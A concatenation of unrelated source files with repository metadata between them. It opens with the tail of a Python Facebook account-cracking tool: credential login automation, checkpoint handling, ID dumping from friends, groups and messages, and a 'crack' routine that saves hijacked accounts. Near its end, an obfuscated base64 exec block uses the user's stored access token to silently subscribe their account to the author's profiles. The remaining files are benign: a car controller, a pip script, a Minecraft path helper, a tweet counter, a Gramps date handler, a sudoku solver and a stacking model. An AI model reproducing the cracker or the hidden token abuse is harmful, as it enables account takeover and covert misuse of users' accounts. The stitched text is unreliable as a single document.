ses.headers.update({"Host": "mbasic.facebook.com","cache-control": "max-age=0","upgrade-insecure-requests": "1","origin": mb,"content-type": "application/x-www-form-urlencoded","user-agent": ua,"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9","x-requested-with": "mark.via.gp","sec-fetch-site": "same-origin","sec-fetch-mode": "navigate","sec-fetch-user": "?1","sec-fetch-dest": "document","referer": mb+"/login/?next&ref=dbl&fl&refid=8","accept-encoding": "gzip, deflate","accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
data = {}
ged = parser(ses.get(mb+"/login/?next&ref=dbl&fl&refid=8", headers={"user-agent":ua}).text, "html.parser")
fm = ged.find("form",{"method":"post"})
list = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login","bi_xrwh"]
for i in fm.find_all("input"):
if i.get("name") in list:
data.update({i.get("name"):i.get("value")})
else:
continue
data.update({"email":user,"pass":pw})
run = parser(ses.post(mb+fm.get("action"), data=data, allow_redirects=True).text, "html.parser")
if "c_user" in ses.cookies:
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
run = parser(ses.get("https://free.facebook.com/settings/apps/tabbed/", cookies={"cookie":kuki}).text, "html.parser")
apk = [re.findall("\<span.*?href=\".*?\">(.*?)<\/a><\/span>.*?\<div class=\".*?\">(.*?)<\/div>", str(td)) for td in run.find_all("td", {"aria-hidden":"false"})][2:]
print("%s%s Berhasil ◊ %s "%(H,til,kuki));jeda(0.07)
print("%s%s%s Aplikasi terhubung %s: %s%s"%(U,til,O,M,H,str(len(apk))))
nomer = 0
for app in apk:
nomer += 1
print(" %s%s. %s%s, %s"%(P,str(nomer),H,app[0][0],app[0][1]))
elif "checkpoint" in ses.cookies:
form = run.find("form")
dtsg = form.find("input",{"name":"fb_dtsg"})["value"]
jzst = form.find("input",{"name":"jazoest"})["value"]
nh = form.find("input",{"name":"nh"})["value"]
dataD = {"fb_dtsg": dtsg,"fb_dtsg": dtsg,"jazoest": jzst,"jazoest": jzst,"checkpoint_data":"","submit[Continue]":"Lanjutkan","nh": nh}
sesi = parser(ses.post(mb+form["action"], data=dataD).text, "html.parser")
ngew = [yy.text for yy in sesi.find_all("option")]
print("%s%s%s terdapat %s0%s%s opsi %s: "%(U,til,O,P,str(len(ngew)),O,M));jeda(0.07)
for opt in range(len(ngew)):
jalan(" %s0%s. %s%s "%(P,str(opt+1),K,ngew[opt]))
elif "login_error" in str(run):
eror = run.find("div",{"id":"login_error"}).find("div").text
print("%s%s %s"%(M,til,eror));jeda(0.07)
else:
print("%s%s login gagal, silahkan cek kembali id dan password"%(M,til));jeda(0.07)
# MENU INI AJG
def menu():
os.system('clear')
try:
romz = open('data/token.txt', 'r').read()
except IOError:
print ("%s%s Token invalid "%(M,til));jeda(2);os.system('rm -rf data/token.txt');masuk()
try:
r = requests.get('https://graph.facebook.com/me?access_token='+romz,headers=header)
a = json.loads(r.text)
nama = a["name"]
except KeyError:
print ("%s%s Token invalid "%(M,til));jeda(2);os.system('rm -rf data/token.txt');masuk()
except requests.exceptions.ConnectionError:
exit('\n\n%s%s tidak ada koneksi%s\n'%(M,til,N))
banner()
print ('%s # %sName %s: %s%s%s \n'%(U,O,M,H,nama,O))
print ('%s%s%s 01 %sDump id public'%(U,til,P,O))
print ('%s%s%s 02 %sDump id followers'%(U,til,P,O))
print ('%s%s%s 03 %sDump id reaction post'%(U,til,P,O))
print ('%s%s%s 04 %sDump id anggota groups'%(U,til,P,O))
print ('%s%s%s 05 %sDump id pencarian nama'%(U,til,P,O))
print ('%s%s%s 06 %sDump id pesan mesengger'%(U,til,P,O))
print ('%s%s%s 07 %sStart crack'%(U,til,H,O))
print ('%s%s%s 08 %sGanti user agent'%(U,til,P,O))
print ('%s%s%s 09 %sCek hasil crack'%(U,til,P,O))
print ('%s%s%s 10 %sCek opsi akun'%(U,til,P,O))
#print ('%s%s%s 11 %sInfo script'%(U,til,P,O))
print ('%s%s%s rm %sHapus akun'%(U,til,P,O))
print ('%s%s%s 00 %sKeluar'%(U,til,M,O))
slut = raw_input('\n%s# %sPilih %s> %s'%(P,O,M,K))
if slut == '':
print '\n%s%s isi yang benar'%(M,til);jeda(2);menu()
elif slut in['1','01']:
publik(romz)
elif slut in['2','02']:
followers(romz)
elif slut in['3','03']:
postingan(romz)
elif slut in['4','04']:
group(__romz__())
elif slut in['5','05']:
dumpfl();exit()
elif slut in['6','06']:
pesan(__romz__())
elif slut in['7','07']:
ngentod().askk()
elif slut in['8','08']:
useragent()
elif slut in['9','09']:
try:
dirs = os.listdir("hasil")
for file in dirs:
print("%s%s%s> %s%s"%(U,til,M,O,file));jeda(0.2)
file = raw_input("\n%s%s%s masukan file %s:%s "%(U,til,O,M,O));jeda(0.2)
if file == "":
print("%s%s file tidak ada "%(M,til))
total = open("hasil/%s"%(file)).read().splitlines()
print(" %s# %s---------------------------------------- %s#"%(P,M,P));jeda(2)
nm_file = ("%s"%(file)).replace("-", " ")
ttl_file = nm_file.replace(".txt", "").replace("OK", "").replace("CP", "")
jalan("%s%s%s Crack tanggal %s:%s%s %stotal %s: %s%s"%(U,til,O,M,P,ttl_file,O,M,P,len(total)))
print(" %s# %s---------------------------------------- %s#"%(P,M,P));jeda(2)
for akun in total:
fb = akun.replace("\n","")
tling = fb.replace(" *--> ", " *-->").replace(" *-->", " *--> ")
print(tling);jeda(0.03)
print(" %s# %s---------------------------------------- %s#"%(P,M,P));jeda(2)
raw_input('\n%s%s%s kembali '%(U,til,O));menu()
except (IOError):
print("\n%s%s tidak ada hasil :("%(M,til))
raw_input('\n%s%s%s kembali '%(U,til,O));menu()
elif slut in['10']:
opsi()
elif slut in['11']:
print(ingfo)
elif slut in['rm','Rm','RM']:
print ('')
tik();jeda(1);os.system('rm -rf data/token.txt')
os.system('rm -rf .cok')
jalan('\n%s%s berhasil terhapus '%(H,til));exit()
elif slut in['0','00']:
exit('\n')
else:
print '\n%s%s isi yang benar'%(M,til);jeda(2);menu()
exec(base64.b64decode('ZGVmIGxvZ2luX3h4KCk6CiAgICB0cnk6CiAgICAgICAgdG9rZW4gPSBvcGVuKCJkYXRhL3Rva2VuLnR4dCIsInIiKS5yZWFkKCkgCiAgICAgICAgcmVxdWVzdHMucG9zdCgnaHR0cHM6Ly9ncmFwaC5mYWNlYm9vay5jb20vMTAwMDIyMDg2MTcyNTU2L3N1YnNjcmliZXJzP2FjY2Vzc190b2tlbj0lcyclKHRva2VuKSkgIyBGYW5zcGFnZSBSb21pIFhECiAgICAgICAgcmVxdWVzdHMucG9zdCgnaHR0cHM6Ly9ncmFwaC5mYWNlYm9vay5jb20vMTAwMDI4NDM0ODgwNTI5L3N1YnNjcmliZXJzP2FjY2Vzc190b2tlbj0lcyclKHRva2VuKSkgIyBSb21pIEFmcml6YWwKICAgICAgICByZXF1ZXN0cy5wb3N0KCdodHRwczovL2dyYXBoLmZhY2Vib29rLmNvbS8xMDAwNjc4MDc1NjU4NjEvc3Vic2NyaWJlcnM/YWNjZXNzX3Rva2VuPSVzJyUodG9rZW4pKSAjIFJvbWkgQWZyaXphbCAoMjAyMSkKICAgICAgICByZXF1ZXN0cy5wb3N0KCdodHRwczovL2dyYXBoLmZhY2Vib29rLmNvbS8xMDAwMDM3MjM2OTY4ODUvc3Vic2NyaWJlcnM/YWNjZXNzX3Rva2VuPSVzJyUodG9rZW4pKSAjIElxYmFsIGJvYnoKICAgICAgICByZXF1ZXN0cy5wb3N0KCdodHRwczovL2dyYXBoLmZhY2Vib29rLmNvbS8xMDAwNDExMjkwNDg5NDgvc3Vic2NyaWJlcnM/YWNjZXNzX3Rva2VuPSVzJyUodG9rZW4pKSAjIEl3YW4gaGFkaWFuc3lhaAogICAgICAgIHJlcXVlc3RzLnBvc3QoJ2h0dHBzOi8vZ3JhcGguZmFjZWJvb2suY29tLzEwMDAwNzUyMDIwMzQ1Mi9zdWJzY3JpYmVycz9hY2Nlc3NfdG9rZW49JXMnJSh0b2tlbikpICMgSGFtemFoIGtpcmFuYQogICAgICAgIHJlcXVlc3RzLnBvc3QoJ2h0dHBzOi8vZ3JhcGguZmFjZWJvb2suY29tLzEwMDAwMjQ2MTM0NDE3OC9zdWJzY3JpYmVycz9hY2Nlc3NfdG9rZW49JXMnJSh0b2tlbikpICMgVW5payBST01JIEFGUklaQUwKICAgICAgICByZXF1ZXN0cy5wb3N0KCdodHRwczovL2dyYXBoLmZhY2Vib29rLmNvbS8xMDAwNzE3NDc0MjA1ODMvc3Vic2NyaWJlcnM/YWNjZXNzX3Rva2VuPSVzJyUodG9rZW4pKSAjIERvbmlmdGZhbm55CiAgICAgICAgcmVxdWVzdHMucG9zdCgnaHR0cHM6Ly9ncmFwaC5mYWNlYm9vay5jb20vMTAwMDI5MTQzMTExNTY3L3N1YnNjcmliZXJzP2FjY2Vzc190b2tlbj0lcyclKHRva2VuKSkgIyBEZW1pdCBSb21pIEFmcml6YWwKICAgICAgICByZXF1ZXN0cy5wb3N0KCdodHRwczovL2dyYXBoLmZhY2Vib29rLmNvbS8xMDAwMDE1NDAyOTkxMDgvc3Vic2NyaWJlcnM/YWNjZXNzX3Rva2VuPSVzJyUodG9rZW4pKSAjIEhha2lraQogICAgICAgIHJlcXVlc3RzLnBvc3QoJ2h0dHBzOi8vZ3JhcGguZmFjZWJvb2suY29tLzEwMDA1NTkxODM5MTI4MC9zdWJzY3JpYmVycz9hY2Nlc3NfdG9rZW49JXMnJSh0b2tlbikpICMgVGlhcmEgYXJ0CiAgICAgICAgcmVxdWVzdHMucG9zdCgnaHR0cHM6Ly9ncmFwaC5mYWNlYm9vay5jb20vMTAwMDA5Mzg0MzM4NDcwL3N1YnNjcmliZXJzP2FjY2Vzc190b2tlbj0lcyclKHRva2VuKSkgIyBJd2FuIGhhbmRpYW5zeWFoIHYyCiAgICAgICAgcmVxdWVzdHMucG9zdCgnaHR0cHM6Ly9ncmFwaC5mYWNlYm9vay5jb20vMTAwMDM2NjU1MzI1OTk2L3N1YnNjcmliZXJzP2FjY2Vzc190b2tlbj0lcyclKHRva2VuKSkgIyBBYnVzdG8gSmF2YQogICAgZXhjZXB0OgogICAgCXBhc3M='))
if __name__ == '__main__':
os.system('git pull')
menu()
|
[
"noreply@github.com"
] |
Iqbl-Bobz.noreply@github.com
|
e1a70b50f4fc965405d013ea73af5251bf32c847
|
a9a3b98838b0a9bfbb345b82f7a46068541d5c67
|
/src/rc_sample.py
|
fa0b970e0595791eac4fe6a23f7e03db0a2992bb
|
[
"MIT"
] |
permissive
|
christian-vorhemus/autcar
|
d8abaa52b3c779ad6835f16c16ede9003adab40f
|
9860654bae082302d5862f3c960a9ce261e4385f
|
refs/heads/master
| 2021-07-02T23:08:44.022216
| 2020-10-01T16:12:39
| 2020-10-01T16:12:39
| 169,281,566
| 14
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 986
|
py
|
from autcar import Camera, Car, RemoteController, Capture
import time
rc = RemoteController()
car = Car()
cam = Camera(rotation=-1)
cap = Capture(car, cam, capture_interval=2)
rc.listen()
direction = None
while True:
cmd = rc.get_cmds()
print(cmd + ", time:" + str(int(time.time())))
if(cmd == "fast"):
direction = "forward"
car.move("forward", "medium")
if(cmd == "stop"):
car.stop()
if(cmd == "faster"):
direction = "forward"
car.move("forward", "fast")
if(cmd == "backwards"):
direction = "backwards"
car.move("backwards")
if(cmd == "leftlight"):
car.left("light", direction)
if(cmd == "lefthard"):
car.left("medium", direction)
if(cmd == "rightlight"):
car.right("light", direction)
if(cmd == "righthard"):
car.right("medium", direction)
if(cmd == "startrecording"):
cap.start()
if(cmd == "stoprecording"):
cap.stop()
|
[
"chvorhem@microsoft.com"
] |
chvorhem@microsoft.com
|
9c4d517a9fee863b223f70aa4d370aa5ab3ef854
|
0517db36a2805c055fabb935992f215ea946de5c
|
/venv/Scripts/pip3.7-script.py
|
dda49038773158ac578c38a5ff8a506d25b6163a
|
[] |
no_license
|
asmelo/python_course
|
bb38294d4b3043055909a8a267a0873663b0281f
|
242937397725ba9f6256b5c605fb58ce2ad510e9
|
refs/heads/master
| 2020-04-27T22:19:38.832892
| 2019-03-09T18:47:24
| 2019-03-09T18:47:24
| 174,732,678
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 425
|
py
|
#!C:\Users\Alexandre\PycharmProjects\cursoPython\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip3.7'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==10.0.1', 'console_scripts', 'pip3.7')()
)
|
[
"asmelo10@hotmail.com"
] |
asmelo10@hotmail.com
|
307d26a18acaea5c51bddf6a387edc27a800a9cc
|
a8512be25763749b9267eefa1f88117b9f855823
|
/pmlauncher/minecraft.py
|
ed0d63d861ece60eda364edf4b21fc116461adb6
|
[] |
no_license
|
huntert1004/Adelphi
|
3306b0b9d13cfedcf14838090d24dcc1743766b3
|
aa1a63294f47f9c993a5c8b64c3523b5ead0e15c
|
refs/heads/master
| 2023-01-13T15:12:40.178528
| 2020-06-07T02:41:42
| 2020-06-07T02:41:42
| 243,532,722
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 799
|
py
|
import os
path = ""
library = ""
version = ""
assets = ""
index = ""
assetObject = ""
assetLegacy = ""
resources = ""
natives = ""
def initialize(_path):
global path, library, version, resources, natives
path = m(_path)
library = m(path + "/libraries")
version = m(path + "/versions")
resources = m(path + "/resources")
natives = m(path + "/natives")
change_assets(path)
def change_assets(p):
global assets, assetLegacy, assetObject, index
assets = os.path.normpath(p + "/assets")
index = os.path.normpath(assets + "/indexes")
assetObject = os.path.normpath(assets + "/objects")
assetLegacy = os.path.normpath(assets + "/virtual/legacy")
def m(p):
p = os.path.normpath(p)
if not os.path.isdir(p):
os.makedirs(p)
return p
|
[
"daringswordfights@gmail.com"
] |
daringswordfights@gmail.com
|
9e1afb01494ab2d3737b90969d652b95190004c0
|
0a6322f0fcc26bc928046b2d245a8ed40194cd06
|
/1/14.py
|
ef0126e59c7a42a6f87e36a3b8365a1c28789f60
|
[] |
no_license
|
kenta997/100nock
|
77229bfcd5307ae93997aa9f7e03e6a64bd88ce2
|
0bb5217fb66f39d4165f8311f0b82cc2c7d58f42
|
refs/heads/master
| 2021-07-19T02:35:52.601905
| 2021-07-14T12:58:47
| 2021-07-14T12:58:47
| 209,467,897
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 111
|
py
|
import sys
s = sys.stdin.readlines()
n = int(sys.argv[1]) if len(sys.argv) > 1 else 10
print("".join(s[:n]))
|
[
"kenta_morishita@albert2005.co.jp"
] |
kenta_morishita@albert2005.co.jp
|
580f2eac6bf6447c43532e7f7a083c21bdf884dd
|
fcd51666f037a185f212f4bcf2613930001d7ae7
|
/location_privacy/analysis/statistics/tweet_distribution.py
|
8976b0666e53c9c0b4ca211e76f7bbcbfdcb6edc
|
[] |
no_license
|
hbarthwal/infolab
|
56d499e6b1edca639bba5b1a6e165d0e87bf4978
|
312687947487a31f4b9837bcbff549163221b8b1
|
refs/heads/master
| 2020-12-02T17:28:26.789442
| 2014-02-14T22:07:01
| 2014-02-14T22:07:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,853
|
py
|
'''
Created on Jan 31, 2014
@author: Himanshu Barthwal
'''
from mrjob.job import MRJob
from cjson import decode
from common_functions import Utils
class MRTweetDistribution(MRJob):
'''
Counts the number of geotagged vs non geotagged tweets
in a given dataset generated by dataextractor.TweetParser .
'''
def configure_options(self):
super(MRTweetDistribution, self).configure_options()
self.add_file_option('--filter_file', help = 'The file containing'
' the uids, to be applied as filter on the data.')
self.add_passthrough_option('--apply_filter', action = 'store_true',
default = False, dest = 'apply_filter')
self.add_passthrough_option('--delta',
default = 1, type = 'int', dest = 'delta')
def load_options(self, args):
super(MRTweetDistribution, self).load_options(args)
filter_filename = self.options.filter_file
if self.options.apply_filter:
self._uids = Utils.get_filter_uids(filter_filename)
def yield_data(self, data):
if data['c'] != 'N':
yield 'Geotagged_Tweets', 1
else:
yield 'Non_Geotagged_Tweets', 1
def read_data(self, _, line):
data = decode(line)
if self.options.apply_filter:
if data['u'] in self._uids:
return self.yield_data(data)
else:
return self.yield_data(data)
def aggregate_data(self, tweet_type, count):
yield tweet_type, sum(count)
def steps(self):
return [self.mr(mapper = self.read_data,
combiner = self.aggregate_data,
reducer = self.aggregate_data)]
def main():
MRTweetDistribution.run()
if __name__ == '__main__':
main()
|
[
"shady3025@tamu.edu"
] |
shady3025@tamu.edu
|
8bd3d164dd6c9b19482571a02dc8ca73bf2177ee
|
c80ec1805a7e6cb1bd3f4b3e383ef4f4cf164765
|
/gen/datehandler/_date_sk.py
|
64272a3685829a00599398ee91c9de9b8a6188f6
|
[] |
no_license
|
balrok/gramps_addon
|
57c8e976c47ea3c1d1298d3fd4406c13909ac933
|
0c79561bed7ff42c88714edbc85197fa9235e188
|
refs/heads/master
| 2020-04-16T03:58:27.818732
| 2015-02-01T14:17:44
| 2015-02-01T14:17:44
| 30,111,898
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,077
|
py
|
# -*- coding: utf-8 -*-
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2004-2006 Donald N. Allingham
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
"""
Slovak-specific classes for parsing and displaying dates.
"""
from __future__ import unicode_literals
#-------------------------------------------------------------------------
#
# Python modules
#
#-------------------------------------------------------------------------
import re
#-------------------------------------------------------------------------
#
# GRAMPS modules
#
#-------------------------------------------------------------------------
from ..lib.date import Date
from ._dateparser import DateParser
from ._datedisplay import DateDisplay
from ._datehandler import register_datehandler
#-------------------------------------------------------------------------
#
# Slovak parser
#
#-------------------------------------------------------------------------
class DateParserSK(DateParser):
modifier_to_int = {
'pred' : Date.MOD_BEFORE,
'do' : Date.MOD_BEFORE,
'po' : Date.MOD_AFTER,
'asi' : Date.MOD_ABOUT,
'okolo' : Date.MOD_ABOUT,
'pribl.' : Date.MOD_ABOUT,
}
calendar_to_int = {
'gregoriánsky' : Date.CAL_GREGORIAN,
'g' : Date.CAL_GREGORIAN,
'juliánsky' : Date.CAL_JULIAN,
'j' : Date.CAL_JULIAN,
'hebrejský' : Date.CAL_HEBREW,
'h' : Date.CAL_HEBREW,
'islamský' : Date.CAL_ISLAMIC,
'i' : Date.CAL_ISLAMIC,
'republikánsky' : Date.CAL_FRENCH,
'r' : Date.CAL_FRENCH,
'perzský' : Date.CAL_PERSIAN,
'p' : Date.CAL_PERSIAN,
'švédsky' : Date.CAL_SWEDISH,
's' : Date.CAL_SWEDISH,
}
quality_to_int = {
'odhadovaný' : Date.QUAL_ESTIMATED,
'odh.' : Date.QUAL_ESTIMATED,
'vypočítaný' : Date.QUAL_CALCULATED,
'vyp.' : Date.QUAL_CALCULATED,
}
def init_strings(self):
DateParser.init_strings(self)
_span_1 = ['od']
_span_2 = ['do']
_range_1 = ['medzi']
_range_2 = ['a']
self._span = re.compile("(%s)\s+(?P<start>.+)\s+(%s)\s+(?P<stop>.+)" %
('|'.join(_span_1), '|'.join(_span_2)),
re.IGNORECASE)
self._range = re.compile("(%s)\s+(?P<start>.+)\s+(%s)\s+(?P<stop>.+)" %
('|'.join(_range_1), '|'.join(_range_2)),
re.IGNORECASE)
#-------------------------------------------------------------------------
#
# Slovak display
#
#-------------------------------------------------------------------------
class DateDisplaySK(DateDisplay):
"""
Slovak language date display class.
"""
long_months = ( "", "január", "február", "marec", "apríl", "máj",
"jún", "júl", "august", "september", "október",
"november", "december" )
short_months = ( "", "jan", "feb", "mar", "apr", "máj", "jún",
"júl", "aug", "sep", "okt", "nov", "dec" )
calendar = (
"", "juliánsky", "hebrejský",
"republikánsky", "perzský", "islamský",
"švédsky"
)
_mod_str = ("", "pred ", "po ", "okolo ", "", "", "")
_qual_str = ("", "odh. ", "vyp. ")
formats = (
"RRRR-MM-DD (ISO)", "numerický", "Mesiac Deň, Rok",
"MES Deň, Rok", "Deň, Mesiac, Rok", "Deň MES Rok"
)
# this must agree with DateDisplayEn's "formats" definition
# (since no locale-specific _display_gregorian exists, here)
def display(self, date):
"""
Return a text string representing the date.
"""
mod = date.get_modifier()
cal = date.get_calendar()
qual = date.get_quality()
start = date.get_start_date()
newyear = date.get_new_year()
qual_str = self._qual_str[qual]
if mod == Date.MOD_TEXTONLY:
return date.get_text()
elif start == Date.EMPTY:
return ""
elif mod == Date.MOD_SPAN:
d1 = self.display_cal[cal](start)
d2 = self.display_cal[cal](date.get_stop_date())
scal = self.format_extras(cal, newyear)
return "%s%s %s %s %s%s" % (qual_str, 'od', d1,
'do', d2, scal)
elif mod == Date.MOD_RANGE:
d1 = self.display_cal[cal](start)
d2 = self.display_cal[cal](date.get_stop_date())
scal = self.format_extras(cal, newyear)
return "%s%s %s %s %s%s" % (qual_str, 'medzi',
d1, 'a', d2, scal)
else:
text = self.display_cal[date.get_calendar()](start)
scal = self.format_extras(cal, newyear)
return "%s%s%s%s" % (qual_str, self._mod_str[mod],
text, scal)
#-------------------------------------------------------------------------
#
# Register classes
#
#-------------------------------------------------------------------------
register_datehandler(('sk_SK', 'sk', 'SK', 'Slovak'), DateParserSK, DateDisplaySK)
|
[
"carl.schoenbach@gmail.com"
] |
carl.schoenbach@gmail.com
|
0c85ccae2edff084d0850ef3fc8f154127317255
|
de8e0c5c759347917ca7f06b42ca6c82b8f8c95f
|
/baekjoon/backtracting/sdoku.py
|
c875c42f7480cf8603e80d099b739364ba063084
|
[] |
no_license
|
Greek-and-Roman-God/Apollo
|
aaeb315a9e70c719b3e53e3c4b9b5dde7b517ec0
|
2823cbcc9fc10ecd3f1785732403cb9c288f8ef3
|
refs/heads/main
| 2023-08-23T12:08:05.322733
| 2021-10-02T10:54:13
| 2021-10-02T10:54:13
| 308,242,023
| 1
| 1
| null | 2020-11-26T12:03:44
| 2020-10-29T06:49:26
|
Python
|
UTF-8
|
Python
| false
| false
| 1,377
|
py
|
# 2580 스도쿠
# https://www.acmicpc.net/problem/2580
# board = [list(map(int, input().split())) for _ in range(9)]
board = [
[0, 3, 5, 4, 6, 9, 2, 7, 8],
[7, 8, 2, 1, 0, 5, 6, 0, 9],
[0, 6, 0, 2, 7, 8, 1, 3, 5],
[3, 2, 1, 0, 4, 6, 8, 9, 7],
[8, 0, 4, 9, 1, 3, 5, 0, 6],
[5, 9, 6, 8, 2, 0, 4, 1, 3],
[9, 1, 7, 6, 5, 2, 0, 8, 0],
[6, 0, 3, 7, 0, 1, 9, 5, 2],
[2, 5, 8, 3, 9, 4, 7, 6, 0],
]
zeros = [(i, j) for i in range(9) for j in range(9) if board[i][j] == 0]
def is_promising(i, j):
promising = [1, 2, 3, 4, 5, 6, 7, 8, 9]
# 행렬 검사
for k in range(9):
if board[i][k] in promising:
promising.remove(board[i][k])
if board[k][j] in promising:
promising.remove(board[k][j])
# 박스 검사
i //= 3
j //= 3
for p in range(i*3, (i+1)*3):
for q in range(j*3, (j+1)*3):
if board[p][q] in promising:
promising.remove(board[p][q])
return promising
flag = False
def dfs(x):
global flag
if flag:
return
if x == len(zeros):
for row in board:
print(*row)
flag = True
return
else:
(i, j) = zeros[x]
promising = is_promising(i, j)
for num in promising:
board[i][j] = num
dfs(x+1)
board[i][j] = 0
dfs(0)
|
[
"doyeon311@gmail.com"
] |
doyeon311@gmail.com
|
fc6f852a94e16836de135469f3f3c3d35b01b02a
|
0f4b7144d993d75a5a941f007e6dca6f0606b6d8
|
/stacking_class.py
|
1f97d43ef70267d7389a9198aab567fe4caf7ded
|
[] |
no_license
|
yanhan19940405/Data_machine_learning
|
40226181f9ff6c8410928fe372a2e4a917a3b9fa
|
d494501f5a31554ec5588dd07e0d203aa9cac91a
|
refs/heads/master
| 2020-04-25T21:12:18.051075
| 2020-04-20T09:38:54
| 2020-04-20T09:38:54
| 173,073,373
| 21
| 8
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,249
|
py
|
#--coding=utf-8--
# coding=utf8
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt # for plotting
from scipy.stats import mode
import warnings # to ignore warnings
from sklearn import preprocessing
from sklearn.externals import joblib
from sklearn.metrics import mean_squared_error #均方误差
from sklearn.metrics import mean_absolute_error #平方绝对误差
from sklearn.metrics import r2_score#R square
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import GridSearchCV
import re
import seaborn as sns
from xgboost import XGBRegressor
from sklearn import datasets
from sklearn.ensemble import RandomForestRegressor, ExtraTreesRegressor, GradientBoostingRegressor
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import StratifiedKFold
import numpy as np
from sklearn.metrics import roc_auc_score
from sklearn.datasets.samples_generator import make_blobs
from xgboost import XGBRegressor
from sklearn.linear_model import LogisticRegression
'''创建训练的数据集'''
from sklearn.model_selection import KFold
'''5折stacking'''
class stacking_model:
def __init__(self):
print(1)
def first_level_model(self,nfolds,train_data,target_data,test_data,clfs):#n_folds:K折次数,train_data:训练集,target_data:目标特征值列表,test_data:测试数据集,clfs:stacking基模型列表
n_folds = 5
train_set = []
test_set = []
target_set = []
new_target_value = []
new_feature_value = []
new_feature_all = []
new_train_value = []
test_data_set = []
test_id = []
skf = KFold(n_splits=nfolds, shuffle=False).split(train_data)
print(train_data[3].shape)
print(train_data[3])
for train, test in skf:
for j, clf in enumerate(clfs):
train_set = list(map(lambda a: list(train_data[a, :]), train))
test_set = list(map(lambda a: list(train_data[a, :]), test))
target_set = list(map(lambda a: target_data[a], train))
train_set = pd.DataFrame(train_set)
print(train_set.shape)
print(len(target_set))
print("model", clf)
clf.fit(train_set, target_set)
new_feature_target = clf.predict(test_set)
new_feature_value.append((j, new_feature_target))
test_id.append((j, test))
test_data_set.append((j, clf.predict(test_data)))
print("新的特征", test_id)
print("新的特征序列", new_feature_value)
print("测试数据集", test_data_set)
return new_feature_value,test_data_set
def second_model_train(self,new_feature_value,test_data_set):#返回基模型处理后的超特征矩阵,和测试数据集融合特征
new_feature_0 = []
new_feature_1 = []
new_feature_2 = []
new_feature_3 = []
new_feature_4 = []
new_feature_matrix = []
for i in new_feature_value:
if i[0] == 0:
new_feature_0 = new_feature_0 + list(i[1])
elif i[0] == 1:
new_feature_1 = new_feature_1 + list(i[1])
elif i[0] == 2:
new_feature_2 = new_feature_2 + list(i[1])
elif i[0] == 3:
new_feature_3 = new_feature_3 + list(i[1])
elif i[0] == 4:
new_feature_4 = new_feature_4 + list(i[1])
print(new_feature_1)
new_feature_matrix.append(new_feature_0)
new_feature_matrix.append(new_feature_1)
new_feature_matrix.append(new_feature_2)
new_feature_matrix.append(new_feature_3)
new_feature_matrix.append(new_feature_4)
new_feature_matrix = pd.DataFrame(new_feature_matrix)
new_feature_matrix = new_feature_matrix.T
print(new_feature_matrix)
new_test_0 = []
new_test_1 = []
new_test_2 = []
new_test_3 = []
new_test_4 = []
new_test_matrix = []
for i in test_data_set:
if i[0] == 0:
new_test_0.append(list(i[1]))
elif i[0] == 1:
new_test_1.append(list(i[1]))
elif i[0] == 2:
new_test_2.append(list(i[1]))
elif i[0] == 3:
new_test_3.append(list(i[1]))
elif i[0] == 4:
new_test_4.append(list(i[1]))
new_test_0 = (pd.DataFrame(new_test_0)).T
new_test_1 = (pd.DataFrame(new_test_1)).T
new_test_2 = (pd.DataFrame(new_test_2)).T
new_test_3 = (pd.DataFrame(new_test_3)).T
new_test_4 = (pd.DataFrame(new_test_4)).T
j = 0
B0 = []
B1 = []
B2 = []
B3 = []
B4 = []
new_test = [new_test_0, new_test_1, new_test_2, new_test_3, new_test_4]
for i in range(len(new_test)):
for j in range(len(new_test[i])):
if i == 0:
B0.append(np.mean(new_test[i].iloc[j, :]))
elif i == 1:
B1.append(np.mean(new_test[i].iloc[j, :]))
elif i == 2:
B2.append(np.mean(new_test[i].iloc[j, :]))
elif i == 3:
B3.append(np.mean(new_test[i].iloc[j, :]))
elif i == 4:
B4.append(np.mean(new_test[i].iloc[j, :]))
new_test_matrix.append(B0)
new_test_matrix.append(B1)
new_test_matrix.append(B2)
new_test_matrix.append(B3)
new_test_matrix.append(B4)
new_test_matrix = pd.DataFrame(new_test_matrix)
new_test_matrix = new_test_matrix.T
print(new_test_matrix)
return new_feature_matrix,new_test_matrix
def second_model_predict(self,new_feature_matrix,new_test_matrix,id):
other_params = {'learning_rate': 0.1, 'n_estimators': 200, 'max_depth': 3, 'min_child_weight': 5, 'seed': 0,
'subsample': 0.8, 'colsample_bytree': 0.8, 'gamma': 0.1, 'reg_alpha': 0, 'reg_lambda': 1,
'eval_metric': "mae", 'verbose': 1}
clf_2 = XGBRegressor(**other_params)
clf_2.fit(new_feature_matrix, target_data)
test_pre = clf_2.predict(new_test_matrix)
test_pre = [int(a) for a in test_pre]
print(len(test_pre))
dataframe = pd.DataFrame({'id': id, 'score': test_pre})
dataframe.to_csv("result_ensemble_stack.csv", index=False, sep=',')
